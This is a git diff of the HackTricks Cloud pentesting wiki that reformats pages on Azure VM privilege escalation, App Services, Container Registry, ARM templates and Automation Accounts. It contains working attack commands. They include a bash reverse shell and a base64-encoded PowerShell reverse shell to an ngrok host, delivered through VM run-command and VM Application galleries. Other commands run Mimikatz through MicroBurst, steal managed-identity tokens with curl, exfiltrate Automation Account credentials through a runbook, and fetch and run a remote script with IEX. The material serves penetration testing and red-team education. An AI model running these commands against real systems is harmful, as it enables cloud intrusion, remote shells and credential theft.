-{% endcode %}
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
 
 It's also possible to abuse well-known extensions to execute code or perform privileged actions inside the VMs:
 
@@ -124,13 +105,11 @@ It's also possible to abuse well-known extensions to execute code or perform pri
 
 This extension allows to modify the password (or create if it doesn't exist) of users inside Windows VMs.
 
-{% code overflow="wrap" %}
 ```powershell
 # Run VMAccess extension to reset the password
 $cred=Get-Credential # Username and password to reset (if it doesn't exist it'll be created). "Administrator" username is allowed to change the password
 Set-AzVMAccessExtension -ResourceGroupName "" -VMName "" -Name "myVMAccess" -Credential $cred
 ```
-{% endcode %}
 
 
 
@@ -204,8 +183,9 @@ The last 2 permissions might be avoided by sharing the application with the tena
 
 Exploitation example to execute arbitrary commands:
 
-{% tabs %}
-{% tab title="Linux" %}
+{{#tabs }}
+{{#tab name="Linux" }}
+
 ```bash
 # Create gallery (if the isn't any)
 az sig create --resource-group myResourceGroup \
@@ -240,10 +220,11 @@ az vm application set \
    --app-version-ids /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Compute/galleries/myGallery/applications/myReverseShellApp/versions/1.0.2 \
    --treat-deployment-as-failure true
 ```
-{% endtab %}
 
-{% tab title="Windows" %}
-{% code overflow="wrap" %}
+{{#endtab }}
+
+{{#tab name="Windows" }}
+
 ```bash
 # Create gallery (if the isn't any)
 az sig create --resource-group  \
@@ -282,16 +263,17 @@ az vm application set \
    --app-version-ids /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Compute/galleries/myGallery/applications/myReverseShellAppWin/versions/1.0.0 \
    --treat-deployment-as-failure true
 ```
-{% endcode %}
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
 
 ### `Microsoft.Compute/virtualMachines/runCommand/action`
 
 This is the most basic mechanism Azure provides to **execute arbitrary commands in VMs:**
 
-{% tabs %}
-{% tab title="Linux" %}
+{{#tabs }}
+{{#tab name="Linux" }}
+
 ```bash
 # Execute rev shell
 az vm run-command invoke \
@@ -303,9 +285,11 @@ az vm run-command invoke \
 # revshell.sh file content
 echo "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'" > revshell.sh
 ```
-{% endtab %}
 
-{% tab title="Windows" %}
+{{#endtab }}
+
+{{#tab name="Windows" }}
+
 ```bash
 # The permission allowing this is Microsoft.Compute/virtualMachines/runCommand/action
 # Execute a rev shell
@@ -322,7 +306,7 @@ echo -n '$client = New-Object System.Net.Sockets.TCPClient("7.tcp.eu.ngrok.io",1
 ## In Package file link just add any link to a blobl storage file
 export encodedCommand="JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIANwAuAHQAYwBwAC4AZQB1AC4AbgBnAHIAbwBrAC4AaQBvACIALAAxADkAMQA1ADkAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA="
 
-# The content of 
+# The content of
 echo "powershell.exe -EncodedCommand $encodedCommand" > revshell.ps1
 
 
@@ -330,8 +314,9 @@ echo "powershell.exe -EncodedCommand $encodedCommand" > revshell.ps1
 Import-module MicroBurst.psm1
 Invoke-AzureRmVMBulkCMD -Script Mimikatz.ps1 -Verbose -output Output.txt
 ```
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
 
 ### `Microsoft.Compute/virtualMachines/login/action`
 
@@ -351,7 +336,6 @@ All those are the necessary permissions to **create a VM with a specific managed
 
 Depending on the situation more or less permissions might be needed to abuse this technique.
 
-{% code overflow="wrap" %}
 ```bash
 az vm create \
   --resource-group Resource_Group_1 \
@@ -364,14 +348,12 @@ az vm create \
   --location "centralus"
 # By default pub key from ~/.ssh is used (if none, it's generated there)
 ```
-{% endcode %}
 
 ### `Microsoft.Compute/virtualMachines/write`, `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action`
 
 Those permissions are enough to **assign new managed identities to a VM**. Note that a VM can have several managed identities. It can have the **system assigned one**, and **many user managed identities**.\
 Then, from the metadata service it's possible to generate tokens for each one.
 
-{% code overflow="wrap" %}
 ```bash
 # Get currently assigned managed identities to the VM
 az vm identity show \
@@ -386,27 +368,15 @@ az vm identity assign \
     /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/TestManagedIdentity1 \
     /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/TestManagedIdentity2
 ```
-{% endcode %}
 
 Then the attacker needs to have **compromised somehow the VM** to steal tokens from the assigned managed identities. Check **more info in**:
 
-{% embed url="https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf#azure-vm" %}
+{{#ref}}
+https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf#azure-vm
+{{#endref}}
 
 ### TODO: Microsoft.Compute/virtualMachines/WACloginAsAdmin/action
 
 According to the [**docs**](https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/compute#microsoftcompute), this permission lets you manage the OS of your resource via Windows Admin Center as an administrator. So it looks like this gives access to the WAC to control the VMs...
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/azure-security/az-services/README.md b/src/pentesting-cloud/azure-security/az-services/README.md
new file mode 100644
index 000000000..26eacc74b
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-services/README.md
@@ -0,0 +1,73 @@
+# Az - Services
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Portals
+
+You can find the list of **Microsoft portals in** [**https://msportals.io/**](https://msportals.io/)
+
+### Raw requests
+
+#### Azure API via Powershell
+
+Get **access_token** from **IDENTITY_HEADER** and **IDENTITY_ENDPOINT**: `system('curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER');`.
+
+Then query the Azure REST API to get the **subscription ID** and more .
+
+```powershell
+$Token = 'eyJ0eX..'
+$URI = 'https://management.azure.com/subscriptions?api-version=2020-01-01'
+# $URI = 'https://graph.microsoft.com/v1.0/applications'
+$RequestParams = @{
+ Method = 'GET'
+ Uri = $URI
+ Headers = @{
+ 'Authorization' = "Bearer $Token"
+ }
+}
+(Invoke-RestMethod @RequestParams).value
+
+# List resources and check for runCommand privileges
+$URI = 'https://management.azure.com/subscriptions/b413826f-108d-4049-8c11-d52d5d388768/resources?api-version=2020-10-01'
+$URI = 'https://management.azure.com/subscriptions/b413826f-108d-4049-8c11-d52d5d388768/resourceGroups//providers/Microsoft.Compute/virtualMachines/ func.HttpResponse:
+    logging.info('Python HTTP trigger function processed a request.')
+    IDENTITY_ENDPOINT = os.environ['IDENTITY_ENDPOINT']
+    IDENTITY_HEADER = os.environ['IDENTITY_HEADER']
+    cmd = 'curl "%s?resource=https://management.azure.com&apiversion=2017-09-01" -H secret:%s' % (IDENTITY_ENDPOINT, IDENTITY_HEADER)
+    val = os.popen(cmd).read()
+    return func.HttpResponse(val, status_code=200)
+```
+
+## List of Services
+
+**The pages of this section are ordered by Azure service. In there you will be able to find information about the service (how it works and capabilities) and also how to enumerate each service.**
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/azure-security/az-services/az-acr.md b/src/pentesting-cloud/azure-security/az-services/az-acr.md
new file mode 100644
index 000000000..3da5a42d2
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-services/az-acr.md
@@ -0,0 +1,52 @@
+# Az - ACR
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Basic Information
+
+Azure Container Registry (ACR) is a managed service provided by Microsoft Azure for **storing and managing Docker container images and other artifacts**. It offers features such as integrated developer tools, geo-replication, security measures like role-based access control and image scanning, automated builds, webhooks and triggers, and network isolation. It works with popular tools like Docker CLI and Kubernetes, and integrates well with other Azure services.
+
+### Enumerate
+
+To enumerate the service you could use the script [**Get-AzACR.ps1**](https://github.com/NetSPI/MicroBurst/blob/master/Misc/Get-AzACR.ps1):
+
+```bash
+# List Docker images inside the registry
+IEX (New-Object Net.Webclient).downloadstring("https://raw.githubusercontent.com/NetSPI/MicroBurst/master/Misc/Get-AzACR.ps1")
+
+Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Internet Explorer\Main" -Name "DisableFirstRunCustomize" -Value 2
+
+Get-AzACR -username  -password  -registry .azurecr.io
+```
+
+{{#tabs }}
+{{#tab name="az cli" }}
+
+```bash
+az acr list --output table
+az acr show --name MyRegistry --resource-group MyResourceGroup
+```
+
+{{#endtab }}
+
+{{#tab name="Az Powershell" }}
+
+```powershell
+# List all ACRs in your subscription
+Get-AzContainerRegistry
+
+# Get a specific ACR
+Get-AzContainerRegistry -ResourceGroupName "MyResourceGroup" -Name "MyRegistry"
+```
+
+{{#endtab }}
+{{#endtabs }}
+
+Login & Pull from the registry
+
+```bash
+docker login .azurecr.io --username  --password 
+docker pull .azurecr.io/:
+```
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/azure-security/az-services/az-app-services.md b/src/pentesting-cloud/azure-security/az-services/az-app-service.md
similarity index 66%
rename from pentesting-cloud/azure-security/az-services/az-app-services.md
rename to src/pentesting-cloud/azure-security/az-services/az-app-service.md
index c8d1139dc..8bd86e5eb 100644
--- a/pentesting-cloud/azure-security/az-services/az-app-services.md
+++ b/src/pentesting-cloud/azure-security/az-services/az-app-service.md
@@ -1,19 +1,6 @@
 # Az - App Services
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 ## App Service Basic Information
 
@@ -21,12 +8,11 @@ Azure App Services enables developers to **build, deploy, and scale web applicat
 
 Each app runs inside a sandbox but isolation depends upon App Service plans
 
-* Apps in Free and Shared tiers run on shared VMs
-* Apps in Standard and Premium tiers run on dedicated VMs
+- Apps in Free and Shared tiers run on shared VMs
+- Apps in Standard and Premium tiers run on dedicated VMs
 
-{% hint style="warning" %}
-Note that **none** of those isolations **prevents** other common **web vulnerabilities** (such as file upload, or injections). And if a **management identity** is used, it could be able to **esalate privileges to them**.
-{% endhint %}
+> [!WARNING]
+> Note that **none** of those isolations **prevents** other common **web vulnerabilities** (such as file upload, or injections). And if a **management identity** is used, it could be able to **esalate privileges to them**.
 
 ### Azure Function Apps
 
@@ -39,7 +25,7 @@ Actually some of the **security related features** App services use (`webapp` in
 When creating a web app (and a Azure function usually) it's possible to indicate if you want Basic Authentication to be enabled. This basically **enables SCM and FTP** for the application so it'll be possible to deploy the application using those technologies.\
 Moreover in order to connect to them, Azure provides an **API that allows to get the username, password and URL** to connect to the SCM and FTP servers.
 
-* Authentication: az webapp auth show --name lol --resource-group lol\_group
+- Authentication: az webapp auth show --name lol --resource-group lol_group
 
 SSH
 
@@ -49,9 +35,9 @@ Debugging
 
 ### Enumeration
 
-{% tabs %}
-{% tab title="az" %}
-{% code overflow="wrap" %}
+{{#tabs }}
+{{#tab name="az" }}
+
 ```bash
 # List webapps
 az webapp list
@@ -82,7 +68,7 @@ az webapp config appsettings list --name  --resource-group 
 az webapp config backup list --webapp-name  --resource-group 
 
 # Get backups scheduled for a webapp
-az webapp config backup show --webapp-name  --resource-group   
+az webapp config backup show --webapp-name  --resource-group 
 
 # Get snapshots
 az webapp config snapshot list --resource-group  -n 
@@ -105,7 +91,6 @@ az webapp config storage-account list --name  --resource-gl_group
 
 
 
-
 # List all the functions
 az functionapp list
 
@@ -125,7 +110,7 @@ az functionapp deployment source show \
 az functionapp config container show \
   --name  \
   --resource-group 
-  
+
 # Get settings (and privesc to the sorage account)
 az functionapp config appsettings list --name  --resource-group 
 
@@ -146,24 +131,26 @@ az rest --method GET \
 curl "?code="
 ## Python example
 curl "https://newfuncttest123.azurewebsites.net/admin/vfs/home/site/wwwroot/function_app.py?code=" -v
-  
+
 # Get source code
 az rest --url "https://management.azure.com//resourceGroups//providers/Microsoft.Web/sites//hostruntime/admin/vfs/function_app.py?relativePath=1&api-version=2022-03-01"
 ```
-{% endcode %}
-{% endtab %}
 
-{% tab title="Az Powershell" %}
+{{#endtab }}
+
+{{#tab name="Az Powershell" }}
+
 ```powershell
 # Get App Services and Function Apps
 Get-AzWebApp
 # Get only App Services
 Get-AzWebApp | ?{$_.Kind -notmatch "functionapp"}
 ```
-{% endtab %}
 
-{% tab title="az get all" %}
-{% code overflow="wrap" %}
+{{#endtab }}
+
+{{#tab name="az get all" }}
+
 ```bash
 #!/bin/bash
 
@@ -192,9 +179,9 @@ echo "$list_app_services" | while IFS=$'\t' read -r appServiceName group; do
   fi
 done
 ```
-{% endcode %}
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
 
 #### Obtain credentials & get access to the webapp code
 
@@ -216,29 +203,12 @@ git clone 'https://:@name.scm.azurewebsites.net/repo-name.gi
 ## If you change the code and do a push, the app is automatically redeployed
 ```
 
-
-
-## Privilege Escalation
-
-{% content-ref url="../az-privilege-escalation/az-app-services-privesc.md" %}
-[az-app-services-privesc.md](../az-privilege-escalation/az-app-services-privesc.md)
-{% endcontent-ref %}
+{{#ref}}
+../az-privilege-escalation/az-app-services-privesc.md
+{{#endref}}
 
 ## References
 
-* [https://learn.microsoft.com/en-in/azure/app-service/overview](https://learn.microsoft.com/en-in/azure/app-service/overview)
+- [https://learn.microsoft.com/en-in/azure/app-service/overview](https://learn.microsoft.com/en-in/azure/app-service/overview)
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/azure-security/az-services/az-application-proxy.md b/src/pentesting-cloud/azure-security/az-services/az-application-proxy.md
new file mode 100644
index 000000000..9e40a66c8
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-services/az-application-proxy.md
@@ -0,0 +1,40 @@
+# Az - Application Proxy
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Basic Information
+
+[From the docs:](https://learn.microsoft.com/en-us/entra/identity/app-proxy/application-proxy)
+
+Azure Active Directory's Application Proxy provides **secure remote access to on-premises web applications**. After a **single sign-on to Azure AD**, users can access both **cloud** and **on-premises applications** through an **external URL** or an internal application portal.
+
+It works like this:
+
+

+
+1. After the user has accessed the application through an endpoint, the user is directed to the **Azure AD sign-in page**.
+2. After a **successful sign-in**, Azure AD sends a **token** to the user's client device.
+3. The client sends the token to the **Application Proxy service**, which retrieves the user principal name (UPN) and security principal name (SPN) from the token. **Application Proxy then sends the request to the Application Proxy connector**.
+4. If you have configured single sign-on, the connector performs any **additional authentication** required on behalf of the user.
+5. The connector sends the request to the **on-premises application**.
+6. The **response** is sent through the connector and Application Proxy service **to the user**.
+
+## Enumeration
+
+```powershell
+# Enumerate applications with application proxy configured
+Get-AzureADApplication | %{try{Get-AzureADApplicationProxyApplication -ObjectId $_.ObjectID;$_.DisplayName;$_.ObjectID}catch{}}
+
+# Get applications service principal
+Get-AzureADServicePrincipal -All $true | ?{$_.DisplayName -eq "Name"}
+
+# Use the following ps1 script from https://learn.microsoft.com/en-us/azure/active-directory/app-proxy/scripts/powershell-display-users-group-of-app
+# to find users and groups assigned to the application. Pass the ObjectID of the Service Principal to it
+Get-ApplicationProxyAssignedUsersAndGroups -ObjectId 
+```
+
+## References
+
+- [https://learn.microsoft.com/en-us/azure/active-directory/app-proxy/application-proxy](https://learn.microsoft.com/en-us/azure/active-directory/app-proxy/application-proxy)
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/azure-security/az-services/az-arm-templates.md b/src/pentesting-cloud/azure-security/az-services/az-arm-templates.md
new file mode 100644
index 000000000..7ee051d41
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-services/az-arm-templates.md
@@ -0,0 +1,31 @@
+# Az - ARM Templates / Deployments
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Basic Information
+
+[From the docs:](https://learn.microsoft.com/en-us/azure/azure-resource-manager/templates/overview) To implement **infrastructure as code for your Azure solutions**, use Azure Resource Manager templates (ARM templates). The template is a JavaScript Object Notation (**JSON**) file that **defines** the **infrastructure** and configuration for your project. The template uses declarative syntax, which lets you state what you intend to deploy without having to write the sequence of programming commands to create it. In the template, you specify the resources to deploy and the properties for those resources.
+
+### History
+
+If you can access it, you can have **info about resources** that are not present but might be deployed in the future. Moreover, if a **parameter** containing **sensitive info** was marked as "**String**" **instead** of "**SecureString**", it will be present in **clear-text**.
+
+## Search Sensitive Info
+
+Users with the permissions `Microsoft.Resources/deployments/read` and `Microsoft.Resources/subscriptions/resourceGroups/read` can **read the deployment history**.
+
+```powershell
+Get-AzResourceGroup
+Get-AzResourceGroupDeployment -ResourceGroupName 
+
+# Export
+Save-AzResourceGroupDeploymentTemplate -ResourceGroupName  -DeploymentName 
+cat .json # search for hardcoded password
+cat  | Select-String password
+```
+
+## References
+
+- [https://app.gitbook.com/s/5uvPQhxNCPYYTqpRwsuS/\~/changes/argKsv1NUBY9l4Pd28TU/pentesting-cloud/azure-security/az-services/az-arm-templates#references](az-arm-templates.md#references)
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/azure-security/az-services/az-automation-account/README.md b/src/pentesting-cloud/azure-security/az-services/az-automation-account/README.md
similarity index 66%
rename from pentesting-cloud/azure-security/az-services/az-automation-account/README.md
rename to src/pentesting-cloud/azure-security/az-services/az-automation-account/README.md
index 8f2797903..6d80d497f 100644
--- a/pentesting-cloud/azure-security/az-services/az-automation-account/README.md
+++ b/src/pentesting-cloud/azure-security/az-services/az-automation-account/README.md
@@ -1,19 +1,6 @@
 # Az - Automation Account
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../../banners/hacktricks-training.md}}
 
 ## Basic Information
 
@@ -26,9 +13,8 @@ These are like "**scheduled tasks**" in Azure that will let you execute things (
 When **Run as Account** is used, it creates an Azure AD **application** with self-signed certificate, creates a **service principal** and assigns the **Contributor** role for the account in the **current subscription** (a lot of privileges).\
 Microsoft recommends using a **Managed Identity** for Automation Account.
 
-{% hint style="warning" %}
-This will be **removed on September 30, 2023 and changed for Managed Identities.**
-{% endhint %}
+> [!WARNING]
+> This will be **removed on September 30, 2023 and changed for Managed Identities.**
 
 ## Runbooks & Jobs
 
@@ -58,13 +44,12 @@ Therefore, if you can choose to run a **Runbook** in a **Windows Hybrid Worker**
 
 It's possible to abuse SC to run arbitrary scripts in the managed machines.
 
-{% content-ref url="az-state-configuration-rce.md" %}
-[az-state-configuration-rce.md](az-state-configuration-rce.md)
-{% endcontent-ref %}
+{{#ref}}
+az-state-configuration-rce.md
+{{#endref}}
 
 ## Enumeration
 
-{% code overflow="wrap" %}
 ```powershell
 # Check user right for automation
 az extension add --upgrade -n automation
@@ -95,11 +80,9 @@ Get-AzAutomationAccount | Get-AzAutomationPython3Package
 # List hybrid workers
 Get-AzAutomationHybridWorkerGroup -AutomationAccountName  -ResourceGroupName 
 ```
-{% endcode %}
 
 ### Create a Runbook
 
-{% code overflow="wrap" %}
 ```powershell
 # Get the role of a user on the Automation account
 # Contributor or higher = Can create and execute Runbooks
@@ -114,11 +97,9 @@ Publish-AzAutomationRunbook -RunbookName  -AutomationAccountName <
 # Start the Runbook
 Start-AzAutomationRunbook -RunbookName  -RunOn Workergroup1 -AutomationAccountName  -ResourceGroupName  -Verbose
 ```
-{% endcode %}
 
 ### Exfiltrate Creds & Variables defined in an Automation Account using a Run Book
 
-{% code overflow="wrap" %}
 ```powershell
 # Change the crdentials & variables names and add as many as you need
 @'
@@ -141,47 +122,45 @@ $start = Start-AzAutomationRunBook -Name $RunBookName -AutomationAccountName $Au
 start-sleep 20
 ($start | Get-AzAutomationJob | Get-AzAutomationJobOutput).Summarynt
 ```
-{% endcode %}
 
-{% hint style="info" %}
-You could do the same thing modifying an existing Run Book, and from the web console.
-{% endhint %}
+> [!NOTE]
+> You could do the same thing modifying an existing Run Book, and from the web console.
 
 ### Steps for Setting Up an Automated Highly Privileged User Creation
 
 #### 1. Initialize an Automation Account
 
-* **Action Required:** Create a new Automation Account.
-* **Specific Setting:** Ensure "Create Azure Run As account" is enabled.
+- **Action Required:** Create a new Automation Account.
+- **Specific Setting:** Ensure "Create Azure Run As account" is enabled.
 
 #### 2. Import and Set Up Runbook
 
-* **Source:** Download the sample runbook from [MicroBurst GitHub Repository](https://github.com/NetSPI/MicroBurst).
-* **Actions Required:**
-  * Import the runbook into the Automation Account.
-  * Publish the runbook to make it executable.
-  * Attach a webhook to the runbook, enabling external triggers.
+- **Source:** Download the sample runbook from [MicroBurst GitHub Repository](https://github.com/NetSPI/MicroBurst).
+- **Actions Required:**
+  - Import the runbook into the Automation Account.
+  - Publish the runbook to make it executable.
+  - Attach a webhook to the runbook, enabling external triggers.
 
 #### 3. Configure AzureAD Module
 
-* **Action Required:** Add the AzureAD module to the Automation Account.
-* **Additional Step:** Ensure all Azure Automation Modules are updated to their latest versions.
+- **Action Required:** Add the AzureAD module to the Automation Account.
+- **Additional Step:** Ensure all Azure Automation Modules are updated to their latest versions.
 
 #### 4. Permission Assignment
 
-* **Roles to Assign:**
-  * User Administrator
-  * Subscription Owner
-* **Target:** Assign these roles to the Automation Account for necessary privileges.
+- **Roles to Assign:**
+  - User Administrator
+  - Subscription Owner
+- **Target:** Assign these roles to the Automation Account for necessary privileges.
 
 #### 5. Awareness of Potential Access Loss
 
-* **Note:** Be aware that configuring such automation might lead to losing control over the subscription.
+- **Note:** Be aware that configuring such automation might lead to losing control over the subscription.
 
 #### 6. Trigger User Creation
 
-* Trigger the webhook to create a new user by sending a POST request.
-* Use the PowerShell script provided, ensuring to replace the `$uri` with your actual webhook URL and updating the `$AccountInfo` with the desired username and password.
+- Trigger the webhook to create a new user by sending a POST request.
+- Use the PowerShell script provided, ensuring to replace the `$uri` with your actual webhook URL and updating the `$AccountInfo` with the desired username and password.
 
 ```powershell
 $uri = ""
@@ -192,21 +171,8 @@ $response = Invoke-WebRequest -Method Post -Uri $uri -Body $body
 
 ## References
 
-* [https://learn.microsoft.com/en-us/azure/automation/overview](https://learn.microsoft.com/en-us/azure/automation/overview)
-* [https://learn.microsoft.com/en-us/azure/automation/automation-dsc-overview](https://learn.microsoft.com/en-us/azure/automation/automation-dsc-overview)
-* [https://github.com/rootsecdev/Azure-Red-Team#runbook-automation](https://github.com/rootsecdev/Azure-Red-Team#runbook-automation)
+- [https://learn.microsoft.com/en-us/azure/automation/overview](https://learn.microsoft.com/en-us/azure/automation/overview)
+- [https://learn.microsoft.com/en-us/azure/automation/automation-dsc-overview](https://learn.microsoft.com/en-us/azure/automation/automation-dsc-overview)
+- [https://github.com/rootsecdev/Azure-Red-Team#runbook-automation](https://github.com/rootsecdev/Azure-Red-Team#runbook-automation)
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/azure-security/az-services/az-automation-account/az-state-configuration-rce.md b/src/pentesting-cloud/azure-security/az-services/az-automation-account/az-state-configuration-rce.md
new file mode 100644
index 000000000..d63ab573e
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-services/az-automation-account/az-state-configuration-rce.md
@@ -0,0 +1,65 @@
+# Az - State Configuration RCE
+
+{{#include ../../../../banners/hacktricks-training.md}}
+
+**Check the complete post in:** [**https://medium.com/cepheisecurity/abusing-azure-dsc-remote-code-execution-and-privilege-escalation-ab8c35dd04fe**](https://medium.com/cepheisecurity/abusing-azure-dsc-remote-code-execution-and-privilege-escalation-ab8c35dd04fe)
+
